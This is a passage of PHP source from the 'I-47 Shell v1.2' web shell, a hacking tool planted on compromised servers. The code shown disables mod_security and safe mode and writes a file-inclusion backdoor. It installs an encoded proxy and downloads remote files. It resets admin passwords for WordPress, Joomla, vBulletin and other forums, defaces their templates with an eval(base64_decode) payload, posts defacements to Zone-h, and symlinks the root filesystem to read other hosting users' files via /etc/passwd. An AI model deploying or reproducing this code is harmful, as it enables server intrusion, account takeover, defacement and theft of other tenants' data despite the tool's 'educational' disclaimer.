  1165. { //end if inputted dir is real -- if not, show an ugly red error
  1166. echo '<b><font color=red>'.$_POST['pathtomass'].' is not available!</font></b>';
  1167. } // end if inputted dir is real, for real this time
  1168. } // end if confirmation to mass sploit is php only
  1169. } // end if massbrowsersploit is called
  1170.  
  1171.  
  1172.  
  1173. if(isset($_GET['to']) && isset($_GET['file']))
  1174. {
  1175. if(!rename($_GET['file'], $_GET['to']))
  1176. {
  1177. $loc = $_SERVER["SCRIPT_NAME"] . "?dir=" . $_GET['getdir'];
  1178. header("Location:$loc");
  1179. ob_end_flush();
  1180.  
  1181. }
  1182. else
  1183. {
  1184. $loc = $_SERVER["SCRIPT_NAME"] . "?dir=" . $_GET['getdir'];
  1185. header("Location:$loc");
  1186. ob_end_flush();
  1187.  
  1188. }
  1189. }
  1190.  
  1191.  
  1192. if(isset($_POST["changeperms"]))
  1193. {
  1194. if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
  1195. {
  1196. $perms = 0;
  1197. for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
  1198. $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
  1199. if(@chmod($_POST['myfilename'],$perms))
  1200. echo "<center><blink><font size=3 color=lime>File Permissions Changed Successfully</font></blink></center>";
  1201. else
  1202. echo "<center><blink><font size=3 color=red>Cannot Change File Permissions</font></blink></center>";
  1203. }
  1204. }
  1205.  
  1206. $setuploadvalue = 0;
  1207. if(isset($_POST['u']))
  1208. {
  1209. $path = $_REQUEST['path'];
  1210. if(is_dir($path))
  1211. {
  1212. $uploadedFilePath = $_FILES['uploadfile']['name'];
  1213. //echo $uploadedFilePath;
  1214. $tempName = $_FILES['uploadfile']['tmp_name'];
  1215. //echo $tempName;
  1216. if($os == "Windows")
  1217. $uploadPath = $path . $directorysperator . $uploadedFilePath;
  1218. else if($os == "Linux")
  1219. $uploadPath = $path . $directorysperator . $uploadedFilePath;
  1220. if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
  1221. {
  1222. echo "<center><font color=lime size=3><blink>File uploaded to $uploadPath</blink></font></center>";
  1223. //header("Location:");
  1224. }
  1225. else
  1226. {
  1227. echo "<center><font color=red size=3><blink>Failed to upload file to $uploadPath</blink></font></center>";
  1228. }
  1229. }
  1230. }
  1231.  
  1232. if(isset($_POST['createdir']))
  1233. {
  1234. if(!mkdir($_POST['createfolder']))
  1235. echo "Failed To create";
  1236. }
  1237. if(isset($_POST['createmyfile'])&&isset($_POST['filecontent']))
  1238. {
  1239. $content = $_POST['filecontent'];
  1240. $file_pointer = fopen($_POST['filecreator'], "w+");
  1241. fwrite($file_pointer, $content);
  1242. fclose($file_pointer);
  1243. $loc = $_SERVER['REQUEST_URI'];
  1244. header("Location:$loc");
  1245. ob_end_flush();
  1246. }
  1247.  
  1248.  
  1249. //Turn Safe Mode Off
  1250.  
  1251. if(getDisabledFunctions() != "None" || safe() != "OFF")
  1252. {
  1253. $file_pointer = fopen(".htaccess", "w+");
  1254. fwrite($file_pointer, "<IfModule mod_security.c>
  1255. SecFilterEngine Off
  1256. SecFilterScanPOST Off
  1257. </IfModule>");
  1258.  
  1259. $file_pointer = fopen("ini.php", "w+");
  1260. fwrite($file_pointer, "<?
  1261. echo ini_get(\"safe_mode\");
  1262. echo ini_get(\"open_basedir\");
  1263. include(\$_GET[\"file\"]);
  1264. ini_restore(\"safe_mode\");
  1265. ini_restore(\"open_basedir\");
  1266. echo ini_get(\"safe_mode\");
  1267. echo ini_get(\"open_basedir\");
  1268. include(\$_GET[\"ss\"]);
  1269. ?>");
  1270.  
  1271. $file_pointer = fopen("php.ini", "w+");
  1272. fwrite($file_pointer, "safe_mode = Off");
  1273.  
  1274. fclose($file_pointer);
  1275. //echo "Safe Mode Is Now Off..";
  1276. }
  1277.  
  1278. if(isset($_GET["downloadit"]))
  1279. {
  1280. $FolderToCompress = getcwd();
  1281. execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
  1282.  
  1283. $prd=explode("/","backup.tar");
  1284. for($i=0;$i<sizeof($prd);$i++)
  1285. {
  1286. $nfd=$prd[$i];
  1287. }
  1288. @ob_clean();
  1289. header("Content-type: application/octet-stream");
  1290. header("Content-length: ".filesize($nfd));
  1291. header("Content-disposition: attachment; filename=\"".$nfd."\";");
  1292. readfile($nfd);
  1293.  
  1294. exit;
  1295. }
  1296.  
  1297. ?>
  1298. <a href="javascript:history.back(1)"><font color=lime size="3"> [Back] </font></a>&nbsp;
  1299. <a href="javascript:history.go(1)"><font color=lime size="3"> [Forward] </font></a>&nbsp;
  1300. <a href=""><font color=lime size="3"> [Refresh] </font></a>&nbsp;
  1301. <?php
  1302.  
  1303. if(isset($_POST['uploadurl']))
  1304. {
  1305. $functiontype = trim($_POST['functiontype']);
  1306. $wurl = trim($_POST['wurl']);
  1307. $path = magicboom($_POST['path']);
  1308. $namafile = remotedownload($functiontype,$wurl);
  1309. $fullpath = $path . $directorysperator . $namafile;
  1310. if(is_file($fullpath))
  1311. {
  1312. echo "<center><font color=lime size=3>File uploaded to $fullpath</font></center>";
  1313. }
  1314. else
  1315. echo "<center><font color=red size=3>Failed to upload $namafile</font></center>";
  1316. }
  1317.  
  1318. // Install Php Proxy
  1319. if (isset($_GET["phpproxy"]))
  1320. {
  1321. ?><br><center><table cellpadding="5" border="1" style="width:60%;">
  1322. <tr><td colspan="2" align="center">
  1323. <font color="#FF0000" size="4">Install PHP Based Proxy</font></td></tr><tr><td style="height:60px;" align="right">
  1324. <form action=<?php echo $self; ?> method=GET>
  1325. <input type=hidden name="act" value="phpproxy">
  1326. <input type=hidden name="install" value="yup">
  1327. <font color="#FF0000" size="3">Path to install in:</td><td><input type=text class="box" name="path" value="<?php echo $dir; ?>"> (must have final /)</td></font></tr><tr><td colspan="2" align="center" style="height:40px;">
  1328. <input type=submit value="Install" class="but"></form></td></tr></table></center><br>
  1329. <?php }
  1330. else if(isset($_GET['install']))
  1331. {
  1332. if (is_writable($_GET['path']))
  1333. {
  1334. @$fh=fopen($_GET['path'].'proxy.php','w');
  1335. @fwrite($fh,gzinflate(base64_decode($phpproxy)));
  1336. @fclose($fh);
  1337.  
  1338. echo '<br><center><blink><font color=lime size=3>proxy.php was created in '.htmlentities($_GET['path']).'</font></blink></center><br><br>';
  1339. chmod($_GET['path'].'/proxy.php', 0777);
  1340. }else{
  1341. echo '<br><center><font color=red size=3><b>Directory is not writable!</b><br></font></center><br>';
  1342. }
  1343. }
  1344.  
  1345. else if(isset($_GET['about']))
  1346. { ?>
  1347. <bR><center>
  1348. <p><font color=red size=6><u>I-47 Shell v1.2</u></font><br>
  1349. <font color=red size=5>[--==Coded By Arjun==--]</font><br>
  1350. <br><font class="txt"><pre>
  1351. ================================
  1352. ----- / -------
  1353. | / /
  1354. | ___ /___| /
  1355. | | /
  1356. ----- | /
  1357.  
  1358. ================================
  1359.  
  1360. </pre></font></center>
  1361. <font class="txt">I-47 Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purpose or testing on your own server.The developer of the script is not responsibe for any damage or misuse of it</font><br><br><center><font color=red size=5>GREETZ To All Indian Hackers</font><br><font color=red size=6>| &#2332;&#2351; &#2361;&#2367;&#2344;&#2381;&#2342; |</font></center><br>
  1362. <?php }
  1363.  
  1364. // Zone-h Poster
  1365. else if(isset($_GET["zone"]))
  1366. {
  1367. if(!function_exists('curl_version'))
  1368. {
  1369. echo "<pre class=ml1 style='margin-top:5px'><center><font color=red>PHP CURL NOT EXIT</font></center></pre>";
  1370. }
  1371. ?>
  1372. <center><font size="4" color="#FF0000">Zone-h Poster</font></center>
  1373. <form action="<?php echo $self; ?>" method="post">
  1374. <table align="center" cellpadding="5" border="0">
  1375. <tr>
  1376. <td>
  1377. <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
  1378. <tr><td>
  1379. <select name="hackmode" class="box">
  1380. <option >--------SELECT--------</option>
  1381. <option value="1">known vulnerability (i.e. unpatched system)</option>
  1382. <option value="2" >undisclosed (new) vulnerability</option>
  1383. <option value="3" >configuration / admin. mistake</option>
  1384. <option value="4" >brute force attack</option>
  1385. <option value="5" >social engineering</option>
  1386. <option value="6" >Web Server intrusion</option>
  1387. <option value="7" >Web Server external module intrusion</option>
  1388. <option value="8" >Mail Server intrusion</option>
  1389. <option value="9" >FTP Server intrusion</option>
  1390. <option value="10" >SSH Server intrusion</option>
  1391. <option value="11" >Telnet Server intrusion</option>
  1392. <option value="12" >RPC Server intrusion</option>
  1393. <option value="13" >Shares misconfiguration</option>
  1394. <option value="14" >Other Server intrusion</option>
  1395. <option value="15" >SQL Injection</option>
  1396. <option value="16" >URL Poisoning</option>
  1397. <option value="17" >File Inclusion</option>
  1398. <option value="18" >Other Web Application bug</option>
  1399. <option value="19" >Remote administrative panel access bruteforcing</option>
  1400. <option value="20" >Remote administrative panel access password guessing</option>
  1401. <option value="21" >Remote administrative panel access social engineering</option>
  1402. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
  1403. <option value="23" >Access credentials through Man In the Middle attack</option>
  1404. <option value="24" >Remote service password guessing</option>
  1405. <option value="25" >Remote service password bruteforce</option>
  1406. <option value="26" >Rerouting after attacking the Firewall</option>
  1407. <option value="27" >Rerouting after attacking the Router</option>
  1408. <option value="28" >DNS attack through social engineering</option>
  1409. <option value="29" >DNS attack through cache poisoning</option>
  1410. <option value="30" >Not available</option>
  1411. </select>
  1412. </td></tr>
  1413. <tr><td>
  1414. <select name="reason" class="box">
  1415. <option >--------SELECT--------</option>
  1416. <option value="1" >Heh...just for fun!</option>
  1417. <option value="2" >Revenge against that website</option>
  1418. <option value="3" >Political reasons</option>
  1419. <option value="4" >As a challenge</option>
  1420. <option value="5" >I just want to be the best defacer</option>
  1421. <option value="6" >Patriotism</option>
  1422. <option value="7" >Not available</option>
  1423. </select></td></tr>
  1424. <tr><td>
  1425. <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
  1426. <tr><td>
  1427. <input type="submit" class="but" value="Send Now !" name="SendNowToZoneH" /></td></tr></table>
  1428. </form>
  1429. <?php }
  1430.  
  1431. // Password Change Forums
  1432. else if(isset($_POST['forumpass']))
  1433. {
  1434. $localhost = $_POST['f1'];
  1435. $database = $_POST['f2'];
  1436. $username = $_POST['f3'];
  1437. $password = $_POST['f4'];
  1438. $prefix = $_POST['prefix'];
  1439. $uid = $_POST['uid'];
  1440. $newpass = $_POST['newpass'];
  1441. if($_POST['forums'] == "vb")
  1442. {
  1443. $con = mysql_connect($localhost,$username,$password);
  1444. $db = mysql_select_db($database,$con);
  1445. $salt = "eghjghrtd";
  1446. $newpassword = md5(md5($newpass) . $salt);
  1447. if($prefix == "" || $prefix == null)
  1448. $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
  1449. else
  1450. $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
  1451. if($sql)
  1452. {
  1453. mysql_close($con);
  1454. header("Location:$self?forum&passwordchange&changed");
  1455. ob_end_flush();
  1456. }
  1457. else
  1458. header("Location:$self?forum&passwordchange&cannotchange");
  1459. }
  1460. if($_POST['forums'] == "mybb")
  1461. {
  1462. $con = mysql_connect($localhost,$username,$password);
  1463. $db = mysql_select_db($database,$con);
  1464. $salt = "jeghj";
  1465. $newpassword = md5(md5($salt).$newpass);
  1466. if($prefix == "" || $prefix == null)
  1467. $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
  1468. else
  1469. $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
  1470. if($sql)
  1471. {
  1472. mysql_close($con);
  1473. header("Location:$self?forum&passwordchange&changed");
  1474. ob_end_flush();
  1475. }
  1476. else
  1477. header("Location:$self?forum&passwordchange&cannotchange");
  1478. }
  1479. if($_POST['forums'] == "smf")
  1480. {
  1481. $con = mysql_connect($localhost,$username,$password);
  1482. $db = mysql_select_db($database,$con);
  1483. $salt = "eghj";
  1484.  
  1485. if($prefix == "" || $prefix == null)
  1486. {
  1487. $result = mysql_query("select member_name from smf_members where id_member = 1");
  1488. $row = mysql_fetch_array($result);
  1489. $membername = $row['member_name'];
  1490. $newpassword = sha1(strtolower($membername).$newpass);
  1491. $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
  1492. }
  1493. else
  1494. {
  1495. $result = mysql_query("select member_name from ".$prefix."members where id_member = 1");
  1496. $row = mysql_fetch_array($result);
  1497. $membername = $row['member_name'];
  1498. $newpassword = sha1(strtolower($membername).$newpass);
  1499. $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
  1500. }
  1501. if($sql)
  1502. {
  1503. mysql_close($con);
  1504. header("Location:$self?forum&passwordchange&changed");
  1505. ob_end_flush();
  1506. }
  1507. else
  1508. header("Location:$self?forum&passwordchange&cannotchange");
  1509. }
  1510. if($_POST['forums'] == "phpbb")
  1511. {
  1512. $con = mysql_connect($localhost,$username,$password);
  1513. $db = mysql_select_db($database,$con);
  1514.  
  1515. $newpassword = md5($newpass);echo $newpassword;
  1516. if(empty($prefix) || $prefix == null)
  1517. $sql = mysql_query("update phpbb_users set user_password = '$newpassword' where user_id = '$uid'");
  1518. else
  1519. $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
  1520. if($sql)
  1521. {
  1522. mysql_close($con);
  1523. header("Location:$self?forum&passwordchange&changed");
  1524. ob_end_flush();
  1525. }
  1526. else
  1527. header("Location:$self?forum&passwordchange&cannotchange");
  1528. }
  1529. if($_POST['forums'] == "ipb")
  1530. { echo "gjhfg";
  1531. $con = mysql_connect($localhost,$username,$password);
  1532. $db = mysql_select_db($database,$con);
  1533. $salt = "eghj";
  1534. $newpassword = md5(md5($salt).md5($newpass));
  1535. if($prefix == "" || $prefix == null)
  1536. $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
  1537. else
  1538. $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
  1539. if($sql)
  1540. {
  1541. mysql_close($con);
  1542. header("Location:$self?forum&passwordchange&changed");
  1543. ob_end_flush();
  1544. }
  1545. else
  1546. header("Location:$self?forum&passwordchange&cannotchange");
  1547. }
  1548. if($_POST['forums'] == "wp")
  1549. {
  1550. $uname = $_POST['uname'];
  1551. $con = mysql_connect($localhost,$username,$password);
  1552. $db = mysql_select_db($database,$con);
  1553.  
  1554. $newpassword = md5($newpass);
  1555. if($prefix == "" || $prefix == null)
  1556. $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
  1557. else
  1558. $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
  1559. if($sql)
  1560. {
  1561. mysql_close($con);
  1562. header("Location:$self?forum&passwordchange&changed#wordp");
  1563. ob_end_flush();
  1564. }
  1565. else
  1566. header("Location:$self?forum&passwordchange&cannotchange#wordp");
  1567. }
  1568. if($_POST['forums'] == "joomla")
  1569. {
  1570. $uname = $_POST['uname'];
  1571. $con = mysql_connect($localhost,$username,$password);
  1572. $db = mysql_select_db($database,$con);
  1573.  
  1574. $newpassword = md5($newpass);
  1575. if($prefix == "" || $prefix == null)
  1576. $sql = mysql_query("update jos_users set password = '$newpassword', username = '$uname' where name = 'Super User'");
  1577. else
  1578. $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$uname' where name = 'Super User' OR name = 'Administrator'");
  1579. if($sql)
  1580. {
  1581. mysql_close($con);
  1582. header("Location:$self?forum&passwordchange&changed#jooml");
  1583. ob_end_flush();
  1584. }
  1585. else
  1586. header("Location:$self?forum&passwordchange&cannotchange#jooml");
  1587. }
  1588. }
  1589.  
  1590. // Deface Forums
  1591. else if(isset($_POST['forumdeface']))
  1592. {
  1593. $localhost = $_POST['f1'];
  1594. $database = $_POST['f2'];
  1595. $username = $_POST['f3'];
  1596. $password = $_POST['f4'];
  1597. $index = $_POST['index'];
  1598. $prefix = $_POST['prefix'];
  1599. if($_POST['forumdeface'] == "Hack VB")
  1600. {
  1601. if($database=$_POST['f2'])
  1602. {
  1603. $con =@ mysql_connect($localhost,$username,$password) or die;
  1604. $db =@ mysql_select_db($database,$con) or die;
  1605. $index=str_replace('"','\\"',$index);
  1606. $attack = "{\${eval(base64_decode(\'";
  1607. $attack .= base64_encode("echo \"$index\";");
  1608. $attack .= "\'))}}{\${exit()}}</textarea>";
  1609. if($prefix == "" || $prefix == null)
  1610. $query = "UPDATE template SET template = '$attack'" or die;
  1611. else
  1612. $query = "UPDATE ".$prefix."template SET template = '$attack'" or die;
  1613. $result =@ mysql_query($query,$con);
  1614. if($result)
  1615. {
  1616. echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
  1617. }
  1618. else
  1619. {
  1620. echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
  1621. }
  1622. }
  1623. }
  1624. else if($_POST['forumdeface'] == "Hack MyBB")
  1625. {
  1626. $localhost = $_POST['f1'];
  1627. $database = $_POST['f2'];
  1628. $username = $_POST['f3'];
  1629. $password = $_POST['f4'];
  1630. $index = $_POST['index'];
  1631. $prefix = $_POST['prefix'];
  1632. if($database=$_POST['f2'])
  1633. {
  1634. $con =@ mysql_connect($localhost,$username,$password) or die;
  1635. $db =@ mysql_select_db($database,$con) or die;
  1636. //$index=str_replace('"','\"',$index);
  1637. $attack = "{\${eval(base64_decode(\'";
  1638. $attack .= base64_encode("echo \"$index\";");
  1639. $attack .= "\'))}}{\${exit()}}</textarea>";
  1640. $attack = str_replace('"',"\\'",$attack);
  1641.  
  1642. echo $attack;
  1643. //$index=str_replace("'","\\'",$index);
  1644. if($prefix == "" || $prefix == null)
  1645. $query = "UPDATE mybb_templates SET template = '$attack'" or die;
  1646. else
  1647. $query = "UPDATE ".$prefix."templates SET template = '$attack'" or die;
  1648. $result =@ mysql_query($query,$con);
  1649. if($result)
  1650. {
  1651. echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
  1652. }
  1653. else
  1654. {
  1655. echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
  1656. }
  1657. }
  1658. }
  1659. else if($_POST['forumdeface'] == "Hack SMF")
  1660. {
  1661. $localhost = $_POST['f1'];
  1662. $database = $_POST['f2'];
  1663. $username = $_POST['f3'];
  1664. $password = $_POST['f4'];
  1665. $index = $_POST['index'];
  1666. $prefix = $_POST['prefix'];
  1667. if($database = $_POST['f2'])
  1668. {
  1669. $con =@ mysql_connect($localhost,$username,$password) or die;
  1670. $db =@ mysql_select_db($database,$con) or die;
  1671. if($prefix == "" || $prefix == null)
  1672. $query = "UPDATE smf_categories SET name='$index' WHERE id_cat='$catid'" or die;
  1673. else
  1674. $query = "UPDATE ".$prefix."categories SET name='$index' WHERE id_cat='$catid'" or die;
  1675. $result =@ mysql_query($query,$con);
  1676. if($result)
  1677. {
  1678. echo "<center><font color=lime size=4><blink>Forum Index Changed Successfully</blink></font></center>";
  1679. }
  1680. else
  1681. {
  1682. echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
  1683. }
  1684. }
  1685. }
  1686. else if($_POST['forumdeface'] == "Hack IPB")
  1687. {
  1688. $localhost = $_POST['f1'];
  1689. $database = $_POST['f2'];
  1690. $username = $_POST['f3'];
  1691. $password = $_POST['f4'];
  1692. $index = $_POST['index'];
  1693. if($database=$_POST['f2'])
  1694. {
  1695. $IPB = "ibf_skin_sets";
  1696. $con =@ mysql_connect($localhost,$username,$password) or die;
  1697. $db =@ mysql_select_db($database,$con) or die;
  1698. $query = "UPDATE $IPB SET set_cache_wrapper = '$index'" or die;
  1699. $result =@ mysql_query($query,$con);
  1700. if($result)
  1701. {
  1702. echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
  1703. }
  1704. else
  1705. {
  1706. echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
  1707. }
  1708. }
  1709. }
  1710. else if($_POST['forumdeface'] == "Hack wordpress")
  1711. {
  1712. $localhost = $_POST['f1'];
  1713. $database = $_POST['f2'];
  1714. $username = $_POST['f3'];
  1715. $password = $_POST['f4'];
  1716. $catid = $_POST['f5'];
  1717. $index = $_POST['index'];
  1718. $prefix = $_POST['prefix'];
  1719. if($database=$_POST['f2'])
  1720. {
  1721. $con =@ mysql_connect($localhost,$username,$password) or die;
  1722. $db =@ mysql_select_db($database,$con) or die;
  1723. if($prefix == "" || $prefix == null)
  1724. $query = "UPDATE wp_posts SET post_title='$index' WHERE ID='$catid'" or die;
  1725. else
  1726. $query = "UPDATE ".$prefix."posts SET post_title='$index' WHERE ID='$catid'" or die;
  1727. $result =@ mysql_query($query,$con);
  1728. if($result)
  1729. {
  1730. echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
  1731. }
  1732. else
  1733. {
  1734. echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
  1735. }
  1736. }
  1737. }
  1738. }
  1739.  
  1740.  
  1741. // Get Domains
  1742. else if(isset($_GET["symlinkserver"]))
  1743. {
  1744. ?>
  1745. <center><table><tr><td><a href="<?php echo $self; ?>?domains&symlinkserver"><font color="lime" size="4">| Get Domains |</font></a></td>
  1746. <td><a href="<?php echo $self; ?>?users&symlinkserver"><font color="lime" size="4">| Users & Domains |</font></a></td>
  1747. <td><a href="<?php echo $self; ?>?symlink&symlinkserver"><font color="lime" size="4">| Symlink Server |</font></a></td>
  1748. <td><a href="<?php echo $self; ?>?symlinkfile&symlinkserver"><font color="lime" size="4">| Symlink File |</font></a></td>
  1749. </tr></table></center><br>
  1750. <?php
  1751. if(isset($_GET["domains"]))
  1752. {
  1753. ?> <center><iframe src="<?php echo 'http://sameip.org/ip/' . getenv('SERVER_ADDR'); ?>" width="80%" height="1000px"></iframe></center>
  1754. <?php }
  1755. else if(isset($_GET["users"]))
  1756. {
  1757. $d0mains = @file("/etc/named.conf");
  1758.  
  1759. if(!$d0mains)
  1760. {
  1761. die("<center><font size=4 color=red>cannot ReaD -> [ /etc/named.conf ]</font><center>");
  1762. }
  1763.  
  1764. $url = 'http://'.$_SERVER['SERVER_NAME'];
  1765.  
  1766. echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Domains</font></td><td align=center><font size=4 color=red>Users</font></td></tr>";
  1767.  
  1768. foreach($d0mains as $d0main)
  1769. {
  1770. if(eregi("zone",$d0main))
  1771. {
  1772. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1773. flush();
  1774.  
  1775. if(strlen(trim($domains[1][0])) > 2)
  1776. {
  1777. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1778.  
  1779. echo "<tr><td><a href=http://www.".$domains[1][0]."/><font size=3 color=lime>".$domains[1][0]."</font></a></td><td><font size=3 color=lime>" . $user['name']. "</font></td></tr>";
  1780. flush();
  1781.  
  1782. }
  1783. }
  1784. }
  1785. echo "</table>";
  1786. }
  1787. else if(isset($_GET["symlink"]))
  1788. {
  1789. $d0mains = @file("/etc/named.conf");
  1790.  
  1791. if($d0mains)
  1792. {
  1793. @mkdir("I47",0777);
  1794. @chdir("I47");
  1795. execmd("ln -s / root");
  1796. $file3 = 'Options all
  1797. DirectoryIndex Sux.html
  1798. AddType text/plain .php
  1799. AddHandler server-parsed .php
  1800. AddType text/plain .html
  1801. AddHandler txt .html
  1802. Require None
  1803. Satisfy Any
  1804. ';
  1805. $fp3 = fopen('.htaccess','w');
  1806. $fw3 = fwrite($fp3,$file3);
  1807. @fclose($fp3);
  1808. echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Domains</font></td><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
  1809.  
  1810. foreach($d0mains as $d0main)
  1811. {
  1812. if(eregi("zone",$d0main))
  1813. {
  1814. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1815. flush();
  1816.  
  1817. if(strlen(trim($domains[1][0])) > 2)
  1818. {
  1819. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1820.  
  1821. echo "<tr><td><a href=http://www.".$domains[1][0]."/><font size=3 color=lime>".$domains[1][0]."</font></a></td><td><font size=3 color=lime>".$user['name']."</font></td><td><a href='/I47/root/home/".$user['name']."/public_html' target='_blank'><font size=3 color=lime>Symlink</font></a></td></tr>"; flush();
  1822.  
  1823. }
  1824. }
  1825. }
  1826. echo "</table>";
  1827. }
  1828. else
  1829. {
  1830. $TEST=@file('/etc/passwd');
  1831. if ($TEST)
  1832. {
  1833. @mkdir("I47",0777);
  1834. @chdir("I47");
  1835. execmd("ln -s / root");
  1836. $file3 = 'Options all
  1837. DirectoryIndex Sux.html
  1838. AddType text/plain .php
  1839. AddHandler server-parsed .php
  1840. AddType text/plain .html
  1841. AddHandler txt .html
  1842. Require None
  1843. Satisfy Any
  1844. ';
  1845. $fp3 = fopen('.htaccess','w');
  1846. $fw3 = fwrite($fp3,$file3);
  1847. @fclose($fp3);
  1848.  
  1849. echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
  1850.  
  1851. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  1852. //Output a line of the file until the end is reached
  1853. while(!feof($file))
  1854. {
  1855. $s = fgets($file);
  1856. $matches = array();
  1857. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1858. $matches = str_replace("home/","",$matches[1]);
  1859. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1860. continue;
  1861. echo "<tr><td align=center><font size=3 color=lime>" . $matches . "</td>";
  1862. echo "<td align=center><font size=3 color=lime><a href=/I47/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1863. }
  1864. fclose($file);
  1865.  
  1866. echo "</table>";
  1867. }
  1868. else
  1869. {
  1870.  
  1871. @mkdir("I47",0777);
  1872. @chdir("I47");
  1873. execmd("ln -s / root");
  1874. $file3 = 'Options all
  1875. DirectoryIndex Sux.html
  1876. AddType text/plain .php
  1877. AddHandler server-parsed .php
  1878. AddType text/plain .html
  1879. AddHandler txt .html
  1880. Require None
  1881. Satisfy Any
  1882. ';
  1883. $fp3 = fopen('.htaccess','w');
  1884. $fw3 = fwrite($fp3,$file3);
  1885. @fclose($fp3);
  1886.  
  1887. echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
  1888.  
  1889. $temp = "";
  1890. $val1 = 0;
  1891. $val2 = 1000;
  1892. for(;$val1 <= $val2;$val1++)
  1893. {
  1894. $uid = @posix_getpwuid($val1);
  1895. if ($uid)
  1896. $temp .= join(':',$uid)."\n";
  1897. }
  1898. echo '<br/>';
  1899. $temp = trim($temp);
  1900.  
  1901. $file5 = fopen("test.txt","w");
  1902. fputs($file5,$temp);
  1903. fclose($file5);
  1904.  
  1905. $file = fopen("test.txt", "r") or exit("Unable to open file!");
  1906. while(!feof($file))
  1907. {
  1908. $s = fgets($file);
  1909. $matches = array();
  1910. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1911. $matches = str_replace("home/","",$matches[1]);
  1912. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1913. continue;
  1914. echo "<tr><td align=center><font size=3 color=lime>" . $matches . "</td>";
  1915. echo "<td align=center><font size=3 color=lime><a href=/I47/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1916. }
  1917. fclose($file);
  1918. echo "</table>";
  1919. unlink("test.txt");
  1920. }
  1921. }
  1922. }
  1923. else if(isset($_GET["symlinkfile"]))
  1924. {
  1925. if(!isset($_GET['file']))
  1926. {
  1927. ?>
  1928. <center>
  1929. <form action="<?php echo $self; ?>">
  1930. <input type="hidden" name="symlinkserver">
  1931. <input type="hidden" name="symlinkfile">
  1932. <input type="text" class="box" name="file" size="50" value="">
  1933. <input type="submit" value="Create Symlink" class="but">
  1934. </form></center>
  1935. <br><br>
  1936. <?php
  1937. }
  1938. else
  1939. {
  1940. $fakedir="cx";
  1941. $fakedep=16;
  1942.  
  1943. $num=0; // offset of symlink.$num
  1944.  
  1945. if(!empty($_GET['file'])) $file=$_GET['file'];
  1946. else if(!empty($_POST['file'])) $file=$_POST['file'];
  1947. else $file="";
  1948.  
  1949. if(empty($file))
  1950. exit;
  1951.  
  1952. if(!is_writable("."))
  1953. die("not writable directory");
  1954.  
  1955. $level=0;
  1956.  
  1957. for($as=0;$as<$fakedep;$as++){
  1958. if(!file_exists($fakedir))
  1959. mkdir($fakedir);
  1960. chdir($fakedir);
  1961. }
  1962.  
  1963. while(1<$as--) chdir("..");
  1964.  
